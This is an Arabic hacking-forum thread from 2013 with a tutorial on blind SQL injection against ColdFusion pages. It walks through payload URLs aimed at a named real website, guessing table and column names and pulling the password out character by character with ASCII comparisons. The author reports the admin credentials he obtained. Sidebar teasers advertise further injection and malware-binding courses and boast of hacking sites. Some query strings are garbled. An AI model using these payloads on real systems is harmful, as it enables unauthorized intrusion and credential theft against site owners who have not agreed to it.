1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] cfm injection

الموضوع في '[ SQL-injection ]' بواسطة عبد الصمد, بتاريخ ‏7 يوليو 2013.

كاتب الموضوع : عبد الصمد المشاهدات : 712 الردود : 5 ‏7 يوليو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    عبد الصمد
    rank
    Developer

    عضو منذ:
    ‏13 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    والصلاة والسلام على رسوله الحبيب

    السلام عليكم

    اليوم راح نتكلم على حقن cfm وفك الغموض عنها

    هي اغلبها يعتمد على التخمين واغلب جداولها بتكون author وحقولها تكون user**** password
    ويتم استخراج المعلومات الي بالحقول بترجمة ascii

    معانا موقع فار تجارب لكن مسالم راح نطبق عليه درسنا



    كود PHP:
    http://www.forege.fr/content.cfm?id=15

    لو نضيفله الشفطه راح يضهر خطا يدل على انه فيه خطا برمجي في ملف content

    احنا راح نخمن باستعلام التالي


    كود PHP:
    and Len((select Count(*) from [user]))

    طلع خطا
    نجرب التخمينات المحتملة
    admin
    users
    login
    الى اخر الحديث

    الان نجرب جدول
    author راح نلاقي رجعت الصفحة بدون اخطاء وهدا يدل على انو الجدول صحيح


    كود PHP:
    www.forege.fr/content.cfm?id=15 
    and Len((select Count(*) from [author]))

    الان نخمن الحقول الي في جدول author

    نجرب user****
    password
    pass
    pwd

    فرضا نجرب
    user_n ame

    راح يطلع معانا خطا

    كود PHP:
    http://www.forege.fr/content.cfm?id=15
    and Len((select top 1 [user_****] from (select top 1 from (select top 1 from [authororder by 1t order by 1 desc)t)) 
    الان نبقى نخمن حتى ترجع الثفحة سليمة والي هي تدل على انو الحقل صحيح

    كود PHP:
    http://www.forege.fr/content.cfm?id=15
    and Len((select top 1 [user****] from (select top 1 from (select top 1 from [authororder by 1t order by 1 desc)t)) 
    كود PHP:
    http://www.forege.fr/content.cfm?id=15
    and Len((select top 1 [passwordfrom (select top 1 from (select top 1 from [authororder by 1t order by 1 desc)t)) 
    الان ناتي للاستخراج المعلومات بترجمة ascii

    كود PHP:
    ascii


    SP        32    
    !        33    
    "        34    
    #        35    
    $        36    
    %        37    
    &        38    
    `        39    
    (        40    
    )        41    
    *        42    
    +        43    
    ,        44    
    -        45    
    .        46    
    /        47    
    0        48    
    1        49    
    2        50    
    3        51    
    4        52    
    5        53    
    6        54    
    7        55    
    8        56    
    9        57    
    :        58    
    ;        59    
    <        60    
    =        61    
    >        62    
    ?        63    
    @        64    
    A        65    
    B        66    
    C        67    
    D        68    
    E        69    
    F        70    
    G        71    
    H        72    
    I        73    
    J        74    
    K        75    
    L        76    
    M        77    
    N        78    
    O        79    
    P        80    
    Q        81    
    R        82    
    S        83    
    T        84    
    U        85    
    V        86    
    W        87    
    X        88    
    Y        89    
    Z        90    
    [        91    
    \        92    
    ]        93    
    ^        94    
    _        95    
    `        96    
    a        97    
    b        98    
    c        99    
    d        100    
    e        101    
    f        102    
    g        103    
    h        104    
    i        105    
    j        106    
    k        107    
    l        108    
    m        109    
    n        110    
    o        111    
    p        112    
    q        113    
    r        114    
    s        115    
    t        116    
    u        117    
    v        118    
    w        119    
    x        120    
    y        121    
    z        122    
    {        123    
    |        124    
    }        125    
    ~        126    
    DEL        127
    الان نستخرج ونتنقل من

    كود PHP:
    http://www.forege.fr/content.cfm?id=15

    and asc(mid((select top 1 [passwordfrom (select top 1 from (select top 1 from [authororder by 1t order by 1 desc)t),1,1))>74 
    وتكون الترجمة خلف الاستعلام اي بمعنى اثح هنا

    كود PHP:
    ))>[COLOR="Red"]74[/COLOR
    ونتنقل لما نلاقي الحرف الاول ننتقل للثاني هنا

    كود PHP:
    ,[COLOR="Red"]1[/COLOR],1))> 
    الي باللون الاحمر

    كود PHP:
    ,[COLOR="Red"]2[/COLOR],1))>74 
    وهيك لحتى نجلب المعلومات

    انا حقنته قبل فتره وكان
    admin
    admin
     


    2 شخص معجب بهذا.
    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    G3niUs.M4n
    rankrank
    Developer

    عضو منذ:
    ‏14 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: cfm injection

    يعطيك العافية يالغالي
    هذي المواضيع إلي ندور عنها
    بطل + تم تقييمك
     


  4. غير متصل

    G.e.r.n.a.s
    rank
    Developer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    مبرمج
    الإقامة:

    رد: cfm injection

    السلام عليكم
    جعل والديك بالجنه .. مآتقصر​
     


  5. غير متصل

    JORDAN 8
    DeveloPer Plus

    عضو منذ:
    ‏16 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: cfm injection

    يِعٌطِيِک الَعٌافُيِة :{1}:​
     


  6. غير متصل

    AhMeD 23
    rankrank
    Developer

    عضو منذ:
    ‏16 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: cfm injection

    السلام عليكم ورحمة الله وبركاته
    جزاك الله الف خيير اخي الغالي
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...